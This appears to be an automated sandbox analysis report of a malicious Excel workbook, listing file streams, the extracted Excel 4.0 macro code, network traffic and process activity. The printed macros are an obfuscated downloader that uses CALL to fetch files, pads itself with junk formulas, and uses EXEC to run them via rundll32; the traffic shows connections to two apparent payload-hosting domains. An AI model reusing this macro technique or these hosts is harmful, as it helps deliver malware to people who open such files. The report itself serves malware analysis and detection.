                                                                                                                                                                          Create Time:2006-09-16 00:00:00
                                                                                                                                                                          Last Saved Time:2021-05-12 07:24:11
                                                                                                                                                                          Creating Application:Microsoft Excel
                                                                                                                                                                          Security:0

                                                                                                                                                                          Document Summary

                                                                                                                                                                          Document Code Page:1251
                                                                                                                                                                          Thumbnail Scaling Desired:False
                                                                                                                                                                          Contains Dirty Links:False

                                                                                                                                                                          Streams

                                                                                                                                                                          Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 4096
                                                                                                                                                                          General
                                                                                                                                                                          Stream Path:\x5DocumentSummaryInformation
                                                                                                                                                                          File Type:data
                                                                                                                                                                          Stream Size:4096
                                                                                                                                                                          Entropy:0.287037498961
                                                                                                                                                                          Base64 Encoded:False
                                                                                                                                                                          Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . 0 . . . . . . . 8 . . . . . . . @ . . . . . . . H . . . . . . . t . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . D o c 1 . . . . . D o c 2 . . . . . D o c 3 . . . . . D o c 4 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . E x c e l 4 . 0 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                                          Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 b4 00 00 00 05 00 00 00 01 00 00 00 30 00 00 00 0b 00 00 00 38 00 00 00 10 00 00 00 40 00 00 00 0d 00 00 00 48 00 00 00 0c 00 00 00 74 00 00 00 02 00 00 00 e3 04 00 00 0b 00 00 00 00 00 00 00 0b 00 00 00 00 00 00 00 1e 10 00 00 04 00 00 00
                                                                                                                                                                          Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 4096
                                                                                                                                                                          General
                                                                                                                                                                          Stream Path:\x5SummaryInformation
                                                                                                                                                                          File Type:data
                                                                                                                                                                          Stream Size:4096
                                                                                                                                                                          Entropy:0.290777742057
                                                                                                                                                                          Base64 Encoded:False
                                                                                                                                                                          Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . X . . . . . . . h . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . v a n - v a n . . . . . . . . . v i - v i . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . . | . # . . . @ . . . . . . . . F . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                                          Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 a0 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 48 00 00 00 08 00 00 00 58 00 00 00 12 00 00 00 68 00 00 00 0c 00 00 00 80 00 00 00 0d 00 00 00 8c 00 00 00 13 00 00 00 98 00 00 00 02 00 00 00 e3 04 00 00 1e 00 00 00 08 00 00 00
                                                                                                                                                                          Stream Path: Book, File Type: Applesoft BASIC program data, first line number 8, Stream Size: 363283
                                                                                                                                                                          General
                                                                                                                                                                          Stream Path:Book
                                                                                                                                                                          File Type:Applesoft BASIC program data, first line number 8
                                                                                                                                                                          Stream Size:363283
                                                                                                                                                                          Entropy:3.24522262131
                                                                                                                                                                          Base64 Encoded:True
                                                                                                                                                                          Data ASCII:. . . . . . . . . 7 . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . v i - v i B . . . . . . . . . . . . . . . . . . . . . . . D o c 3 . . . . . . . . . . . . . . . . . . _ x l f n . A G G R E G A T E . . . . . . . . . . . . . . . . . . . . _ x l f n . F . I N V . R T . . . . ! . . . . .
                                                                                                                                                                          Data Raw:09 08 08 00 00 05 05 00 17 37 cd 07 e1 00 00 00 c1 00 02 00 00 00 bf 00 00 00 c0 00 00 00 e2 00 00 00 5c 00 70 00 05 76 69 2d 76 69 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20

                                                                                                                                                                          Macro 4.0 Code

                                                                                                                                                                          CALL(Doc3!AU10,Doc3!AU11,Doc3!AU12,0,Doc3!AU13,Doc3!BC17,0,!AL21)=CALL(Doc3!AU10,Doc3!AU11,Doc3!AU12,0,Doc3!AU14,Doc3!BC18&"1",0,!AL21)=RUN(Doc4!AM6)
                                                                                                                                                                          
                                                                                                                                                                          ,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=FORMULA(before.3.5.0.sheet!AZ39&BA39&before.3.5.0.sheet!BB39&before.3.5.0.sheet!BC39,before.3.5.0.sheet!AU13)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=FORMULA(before.3.5.0.sheet!AZ40&BA40&before.3.5.0.sheet!BB40&before.3.5.0.sheet!BC40,before.3.5.0.sheet!AU14)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=FORMULA(""U""&before.3.5.0.sheet!BC25&before.3.5.0.sheet!BC29&before.3.5.0.sheet!BF28&before.3.5.0.sheet!BC28&before.3.5.0.sheet!BC31&before.3.5.0.sheet!BF29&""A"",before.3.5.0.she
                                                                                                                                                                          "=CALL(Doc3!AU10,Doc3!AU11,Doc3!AU12,0,Doc3!AU13,Doc3!BC17,0,!AL21)=CALL(Doc3!AU10,Doc3!AU11,Doc3!AU12,0,Doc3!AU14,Doc3!BC18&""1"",0,!AL21)=RUN(Doc4!AM6)"
                                                                                                                                                                          "=MDETERM(56241452475)=EXEC(Doc3!BB22&Doc3!BB23&Doc3!BB24&Doc3!BB30&""2 ""&Doc3!BC17&Doc3!BD31&""lRegi""&""ster""&""Ser""&""ver"")=EXEC(Doc3!BB22&Doc3!BB23&Doc3!BB24&Doc3!BB30&""2 ""&Doc3!BC18&""1""&Doc3!BD31&""lRegi""&""ster""&""Ser""&""ver"")=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=RUN(Doc3!AY22)"

                                                                                                                                                                          Network Behavior

                                                                                                                                                                          Network Port Distribution

                                                                                                                                                                          TCP Packets

                                                                                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                          May 12, 2021 14:17:38.210829020 CEST49736443192.168.2.4192.185.39.58
                                                                                                                                                                          May 12, 2021 14:17:38.369405985 CEST44349736192.185.39.58192.168.2.4
                                                                                                                                                                          May 12, 2021 14:17:38.369527102 CEST49736443192.168.2.4192.185.39.58
                                                                                                                                                                          May 12, 2021 14:17:38.370778084 CEST49736443192.168.2.4192.185.39.58
                                                                                                                                                                          May 12, 2021 14:17:38.529547930 CEST44349736192.185.39.58192.168.2.4
                                                                                                                                                                          May 12, 2021 14:17:38.533749104 CEST44349736192.185.39.58192.168.2.4
                                                                                                                                                                          May 12, 2021 14:17:38.533771992 CEST44349736192.185.39.58192.168.2.4
                                                                                                                                                                          May 12, 2021 14:17:38.533787012 CEST44349736192.185.39.58192.168.2.4
                                                                                                                                                                          May 12, 2021 14:17:38.533898115 CEST49736443192.168.2.4192.185.39.58
                                                                                                                                                                          May 12, 2021 14:17:38.533946037 CEST49736443192.168.2.4192.185.39.58
                                                                                                                                                                          May 12, 2021 14:17:38.550533056 CEST49736443192.168.2.4192.185.39.58
                                                                                                                                                                          May 12, 2021 14:17:38.709755898 CEST44349736192.185.39.58192.168.2.4
                                                                                                                                                                          May 12, 2021 14:17:38.709873915 CEST49736443192.168.2.4192.185.39.58
                                                                                                                                                                          May 12, 2021 14:17:38.710789919 CEST49736443192.168.2.4192.185.39.58
                                                                                                                                                                          May 12, 2021 14:17:38.910866976 CEST44349736192.185.39.58192.168.2.4
                                                                                                                                                                          May 12, 2021 14:17:38.978521109 CEST44349736192.185.39.58192.168.2.4
                                                                                                                                                                          May 12, 2021 14:17:38.978625059 CEST49736443192.168.2.4192.185.39.58
                                                                                                                                                                          May 12, 2021 14:17:38.978797913 CEST49736443192.168.2.4192.185.39.58
                                                                                                                                                                          May 12, 2021 14:17:38.979051113 CEST44349736192.185.39.58192.168.2.4
                                                                                                                                                                          May 12, 2021 14:17:38.979120016 CEST49736443192.168.2.4192.185.39.58
                                                                                                                                                                          May 12, 2021 14:17:39.061523914 CEST49738443192.168.2.4192.185.32.232
                                                                                                                                                                          May 12, 2021 14:17:39.138722897 CEST44349736192.185.39.58192.168.2.4
                                                                                                                                                                          May 12, 2021 14:17:39.219533920 CEST44349738192.185.32.232192.168.2.4
                                                                                                                                                                          May 12, 2021 14:17:39.219695091 CEST49738443192.168.2.4192.185.32.232
                                                                                                                                                                          May 12, 2021 14:17:39.220428944 CEST49738443192.168.2.4192.185.32.232
                                                                                                                                                                          May 12, 2021 14:17:39.378411055 CEST44349738192.185.32.232192.168.2.4
                                                                                                                                                                          May 12, 2021 14:17:39.381866932 CEST44349738192.185.32.232192.168.2.4
                                                                                                                                                                          May 12, 2021 14:17:39.381896973 CEST44349738192.185.32.232192.168.2.4
                                                                                                                                                                          May 12, 2021 14:17:39.381917000 CEST44349738192.185.32.232192.168.2.4
                                                                                                                                                                          May 12, 2021 14:17:39.381963015 CEST49738443192.168.2.4192.185.32.232
                                                                                                                                                                          May 12, 2021 14:17:39.381998062 CEST49738443192.168.2.4192.185.32.232
                                                                                                                                                                          May 12, 2021 14:17:39.393313885 CEST49738443192.168.2.4192.185.32.232
                                                                                                                                                                          May 12, 2021 14:17:39.552030087 CEST44349738192.185.32.232192.168.2.4
                                                                                                                                                                          May 12, 2021 14:17:39.552113056 CEST49738443192.168.2.4192.185.32.232
                                                                                                                                                                          May 12, 2021 14:17:39.553013086 CEST49738443192.168.2.4192.185.32.232
                                                                                                                                                                          May 12, 2021 14:17:39.752700090 CEST44349738192.185.32.232192.168.2.4
                                                                                                                                                                          May 12, 2021 14:17:40.212475061 CEST44349738192.185.32.232192.168.2.4
                                                                                                                                                                          May 12, 2021 14:17:40.212563992 CEST49738443192.168.2.4192.185.32.232
                                                                                                                                                                          May 12, 2021 14:17:40.212889910 CEST44349738192.185.32.232192.168.2.4
                                                                                                                                                                          May 12, 2021 14:17:40.212948084 CEST49738443192.168.2.4192.185.32.232
                                                                                                                                                                          May 12, 2021 14:18:10.309976101 CEST44349738192.185.32.232192.168.2.4

                                                                                                                                                                          UDP Packets

                                                                                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                          May 12, 2021 14:17:20.580465078 CEST4971453192.168.2.48.8.8.8
                                                                                                                                                                          May 12, 2021 14:17:20.630844116 CEST53497148.8.8.8192.168.2.4
                                                                                                                                                                          May 12, 2021 14:17:21.503504038 CEST5802853192.168.2.48.8.8.8
                                                                                                                                                                          May 12, 2021 14:17:21.552934885 CEST53580288.8.8.8192.168.2.4
                                                                                                                                                                          May 12, 2021 14:17:21.904496908 CEST5309753192.168.2.48.8.8.8
                                                                                                                                                                          May 12, 2021 14:17:21.963671923 CEST53530978.8.8.8192.168.2.4
                                                                                                                                                                          May 12, 2021 14:17:22.867420912 CEST4925753192.168.2.48.8.8.8
                                                                                                                                                                          May 12, 2021 14:17:22.919318914 CEST53492578.8.8.8192.168.2.4
                                                                                                                                                                          May 12, 2021 14:17:24.190057039 CEST6238953192.168.2.48.8.8.8
                                                                                                                                                                          May 12, 2021 14:17:24.241807938 CEST53623898.8.8.8192.168.2.4
                                                                                                                                                                          May 12, 2021 14:17:25.612104893 CEST4991053192.168.2.48.8.8.8
                                                                                                                                                                          May 12, 2021 14:17:25.663927078 CEST53499108.8.8.8192.168.2.4
                                                                                                                                                                          May 12, 2021 14:17:28.506179094 CEST5585453192.168.2.48.8.8.8
                                                                                                                                                                          May 12, 2021 14:17:28.558582067 CEST53558548.8.8.8192.168.2.4
                                                                                                                                                                          May 12, 2021 14:17:31.591839075 CEST6454953192.168.2.48.8.8.8
                                                                                                                                                                          May 12, 2021 14:17:31.643302917 CEST53645498.8.8.8192.168.2.4
                                                                                                                                                                          May 12, 2021 14:17:32.746166945 CEST6315353192.168.2.48.8.8.8
                                                                                                                                                                          May 12, 2021 14:17:32.782185078 CEST5299153192.168.2.48.8.8.8
                                                                                                                                                                          May 12, 2021 14:17:32.831306934 CEST53529918.8.8.8192.168.2.4
                                                                                                                                                                          May 12, 2021 14:17:32.845731020 CEST53631538.8.8.8192.168.2.4
                                                                                                                                                                          May 12, 2021 14:17:33.268315077 CEST5370053192.168.2.48.8.8.8
                                                                                                                                                                          May 12, 2021 14:17:33.343764067 CEST53537008.8.8.8192.168.2.4
                                                                                                                                                                          May 12, 2021 14:17:34.319901943 CEST5370053192.168.2.48.8.8.8
                                                                                                                                                                          May 12, 2021 14:17:34.392335892 CEST53537008.8.8.8192.168.2.4
                                                                                                                                                                          May 12, 2021 14:17:35.356930017 CEST5370053192.168.2.48.8.8.8
                                                                                                                                                                          May 12, 2021 14:17:35.407068014 CEST53537008.8.8.8192.168.2.4
                                                                                                                                                                          May 12, 2021 14:17:37.407048941 CEST5370053192.168.2.48.8.8.8
                                                                                                                                                                          May 12, 2021 14:17:37.468116999 CEST53537008.8.8.8192.168.2.4
                                                                                                                                                                          May 12, 2021 14:17:38.149092913 CEST5172653192.168.2.48.8.8.8
                                                                                                                                                                          May 12, 2021 14:17:38.208189964 CEST53517268.8.8.8192.168.2.4
                                                                                                                                                                          May 12, 2021 14:17:38.244544983 CEST5679453192.168.2.48.8.8.8
                                                                                                                                                                          May 12, 2021 14:17:38.293447971 CEST53567948.8.8.8192.168.2.4
                                                                                                                                                                          May 12, 2021 14:17:38.996469021 CEST5653453192.168.2.48.8.8.8
                                                                                                                                                                          May 12, 2021 14:17:39.058789015 CEST53565348.8.8.8192.168.2.4
                                                                                                                                                                          May 12, 2021 14:17:39.077816963 CEST5662753192.168.2.48.8.8.8
                                                                                                                                                                          May 12, 2021 14:17:39.126478910 CEST53566278.8.8.8192.168.2.4
                                                                                                                                                                          May 12, 2021 14:17:39.919742107 CEST5662153192.168.2.48.8.8.8
                                                                                                                                                                          May 12, 2021 14:17:39.971144915 CEST53566218.8.8.8192.168.2.4
                                                                                                                                                                          May 12, 2021 14:17:40.908556938 CEST6311653192.168.2.48.8.8.8
                                                                                                                                                                          May 12, 2021 14:17:40.960778952 CEST53631168.8.8.8192.168.2.4
                                                                                                                                                                          May 12, 2021 14:17:41.453908920 CEST5370053192.168.2.48.8.8.8
                                                                                                                                                                          May 12, 2021 14:17:41.511888981 CEST53537008.8.8.8192.168.2.4
                                                                                                                                                                          May 12, 2021 14:17:45.769051075 CEST6407853192.168.2.48.8.8.8
                                                                                                                                                                          May 12, 2021 14:17:45.817897081 CEST53640788.8.8.8192.168.2.4
                                                                                                                                                                          May 12, 2021 14:17:46.685388088 CEST6480153192.168.2.48.8.8.8
                                                                                                                                                                          May 12, 2021 14:17:46.734082937 CEST53648018.8.8.8192.168.2.4
                                                                                                                                                                          May 12, 2021 14:17:47.722698927 CEST6172153192.168.2.48.8.8.8
                                                                                                                                                                          May 12, 2021 14:17:47.771384001 CEST53617218.8.8.8192.168.2.4
                                                                                                                                                                          May 12, 2021 14:17:48.229245901 CEST5125553192.168.2.48.8.8.8
                                                                                                                                                                          May 12, 2021 14:17:48.286461115 CEST53512558.8.8.8192.168.2.4
                                                                                                                                                                          May 12, 2021 14:17:49.334132910 CEST6152253192.168.2.48.8.8.8
                                                                                                                                                                          May 12, 2021 14:17:49.385809898 CEST53615228.8.8.8192.168.2.4
                                                                                                                                                                          May 12, 2021 14:17:50.136965990 CEST5233753192.168.2.48.8.8.8
                                                                                                                                                                          May 12, 2021 14:17:50.188581944 CEST53523378.8.8.8192.168.2.4
                                                                                                                                                                          May 12, 2021 14:17:51.082541943 CEST5504653192.168.2.48.8.8.8
                                                                                                                                                                          May 12, 2021 14:17:51.131108999 CEST53550468.8.8.8192.168.2.4
                                                                                                                                                                          May 12, 2021 14:17:51.859493971 CEST4961253192.168.2.48.8.8.8
                                                                                                                                                                          May 12, 2021 14:17:51.908250093 CEST53496128.8.8.8192.168.2.4
                                                                                                                                                                          May 12, 2021 14:17:52.833566904 CEST4928553192.168.2.48.8.8.8
                                                                                                                                                                          May 12, 2021 14:17:52.892059088 CEST53492858.8.8.8192.168.2.4
                                                                                                                                                                          May 12, 2021 14:18:12.219947100 CEST5060153192.168.2.48.8.8.8
                                                                                                                                                                          May 12, 2021 14:18:12.279715061 CEST53506018.8.8.8192.168.2.4
                                                                                                                                                                          May 12, 2021 14:18:24.930396080 CEST6087553192.168.2.48.8.8.8
                                                                                                                                                                          May 12, 2021 14:18:24.992497921 CEST53608758.8.8.8192.168.2.4
                                                                                                                                                                          May 12, 2021 14:18:27.237112999 CEST5644853192.168.2.48.8.8.8
                                                                                                                                                                          May 12, 2021 14:18:27.296058893 CEST53564488.8.8.8192.168.2.4
                                                                                                                                                                          May 12, 2021 14:18:44.478377104 CEST5917253192.168.2.48.8.8.8
                                                                                                                                                                          May 12, 2021 14:18:44.535383940 CEST53591728.8.8.8192.168.2.4
                                                                                                                                                                          May 12, 2021 14:19:13.068674088 CEST6242053192.168.2.48.8.8.8
                                                                                                                                                                          May 12, 2021 14:19:13.127079964 CEST53624208.8.8.8192.168.2.4
                                                                                                                                                                          May 12, 2021 14:19:13.784194946 CEST6057953192.168.2.48.8.8.8
                                                                                                                                                                          May 12, 2021 14:19:13.928558111 CEST53605798.8.8.8192.168.2.4
                                                                                                                                                                          May 12, 2021 14:19:14.540947914 CEST5018353192.168.2.48.8.8.8
                                                                                                                                                                          May 12, 2021 14:19:14.602838993 CEST53501838.8.8.8192.168.2.4
                                                                                                                                                                          May 12, 2021 14:19:15.013617992 CEST6153153192.168.2.48.8.8.8
                                                                                                                                                                          May 12, 2021 14:19:15.062412977 CEST53615318.8.8.8192.168.2.4
                                                                                                                                                                          May 12, 2021 14:19:15.591392040 CEST4922853192.168.2.48.8.8.8
                                                                                                                                                                          May 12, 2021 14:19:15.640381098 CEST53492288.8.8.8192.168.2.4
                                                                                                                                                                          May 12, 2021 14:19:15.827440023 CEST5979453192.168.2.48.8.8.8
                                                                                                                                                                          May 12, 2021 14:19:15.901659966 CEST53597948.8.8.8192.168.2.4
                                                                                                                                                                          May 12, 2021 14:19:16.237142086 CEST5591653192.168.2.48.8.8.8
                                                                                                                                                                          May 12, 2021 14:19:16.294898033 CEST53559168.8.8.8192.168.2.4
                                                                                                                                                                          May 12, 2021 14:19:16.770301104 CEST5275253192.168.2.48.8.8.8
                                                                                                                                                                          May 12, 2021 14:19:16.822267056 CEST53527528.8.8.8192.168.2.4
                                                                                                                                                                          May 12, 2021 14:19:17.691365004 CEST6054253192.168.2.48.8.8.8
                                                                                                                                                                          May 12, 2021 14:19:17.751472950 CEST53605428.8.8.8192.168.2.4
                                                                                                                                                                          May 12, 2021 14:19:18.817954063 CEST6068953192.168.2.48.8.8.8
                                                                                                                                                                          May 12, 2021 14:19:18.875502110 CEST53606898.8.8.8192.168.2.4
                                                                                                                                                                          May 12, 2021 14:19:19.769468069 CEST6420653192.168.2.48.8.8.8
                                                                                                                                                                          May 12, 2021 14:19:19.827064991 CEST53642068.8.8.8192.168.2.4
                                                                                                                                                                          May 12, 2021 14:19:37.167013884 CEST5090453192.168.2.48.8.8.8
                                                                                                                                                                          May 12, 2021 14:19:37.234447002 CEST53509048.8.8.8192.168.2.4

                                                                                                                                                                          DNS Queries

                                                                                                                                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                                                                                          May 12, 2021 14:17:38.149092913 CEST192.168.2.48.8.8.80x1c99Standard query (0)signifysystem.comA (IP address)IN (0x0001)
                                                                                                                                                                          May 12, 2021 14:17:38.996469021 CEST192.168.2.48.8.8.80x5325Standard query (0)fcventasyservicios.clA (IP address)IN (0x0001)

                                                                                                                                                                          DNS Answers

                                                                                                                                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                                                                                          May 12, 2021 14:17:38.208189964 CEST8.8.8.8192.168.2.40x1c99No error (0)signifysystem.com192.185.39.58A (IP address)IN (0x0001)
                                                                                                                                                                          May 12, 2021 14:17:39.058789015 CEST8.8.8.8192.168.2.40x5325No error (0)fcventasyservicios.cl192.185.32.232A (IP address)IN (0x0001)

                                                                                                                                                                          HTTPS Packets

                                                                                                                                                                          TimestampSource IPSource PortDest IPDest PortSubjectIssuerNot BeforeNot AfterJA3 SSL Client FingerprintJA3 SSL Client Digest
                                                                                                                                                                          May 12, 2021 14:17:38.533787012 CEST192.185.39.58443192.168.2.449736CN=cpcontacts.signifysystem.com CN=R3, O=Let's Encrypt, C=USCN=R3, O=Let's Encrypt, C=US CN=DST Root CA X3, O=Digital Signature Trust Co.Thu Apr 01 17:00:25 CEST 2021 Wed Oct 07 21:21:40 CEST 2020Wed Jun 30 17:00:25 CEST 2021 Wed Sep 29 21:21:40 CEST 2021771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,037f463bf4616ecd445d4a1937da06e19
                                                                                                                                                                          CN=R3, O=Let's Encrypt, C=USCN=DST Root CA X3, O=Digital Signature Trust Co.Wed Oct 07 21:21:40 CEST 2020Wed Sep 29 21:21:40 CEST 2021
                                                                                                                                                                          May 12, 2021 14:17:39.381917000 CEST192.185.32.232443192.168.2.449738CN=mail.fcventasyservicios.cl CN=R3, O=Let's Encrypt, C=USCN=R3, O=Let's Encrypt, C=US CN=DST Root CA X3, O=Digital Signature Trust Co.Tue Mar 16 13:01:12 CET 2021 Wed Oct 07 21:21:40 CEST 2020Mon Jun 14 14:01:12 CEST 2021 Wed Sep 29 21:21:40 CEST 2021771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,037f463bf4616ecd445d4a1937da06e19
                                                                                                                                                                          CN=R3, O=Let's Encrypt, C=USCN=DST Root CA X3, O=Digital Signature Trust Co.Wed Oct 07 21:21:40 CEST 2020Wed Sep 29 21:21:40 CEST 2021

                                                                                                                                                                          Code Manipulations

                                                                                                                                                                          Statistics

                                                                                                                                                                          CPU Usage

                                                                                                                                                                          Click to jump to process

                                                                                                                                                                          Memory Usage

                                                                                                                                                                          Click to jump to process

                                                                                                                                                                          High Level Behavior Distribution

                                                                                                                                                                          Click to dive into process behavior distribution

                                                                                                                                                                          Behavior

                                                                                                                                                                          Click to jump to process

                                                                                                                                                                          System Behavior

                                                                                                                                                                          General

                                                                                                                                                                          Start time:14:17:30
                                                                                                                                                                          Start date:12/05/2021
                                                                                                                                                                          Path:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                          Commandline:'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
                                                                                                                                                                          Imagebase:0x360000
                                                                                                                                                                          File size:27110184 bytes
                                                                                                                                                                          MD5 hash:5D6638F2C8F8571C593999C58866007E
                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                          Reputation:high

                                                                                                                                                                          General

                                                                                                                                                                          Start time:14:17:39
                                                                                                                                                                          Start date:12/05/2021
                                                                                                                                                                          Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                          Commandline:rundll32 ..\ritofm.cvm,DllRegisterServer
                                                                                                                                                                          Imagebase:0x3e0000
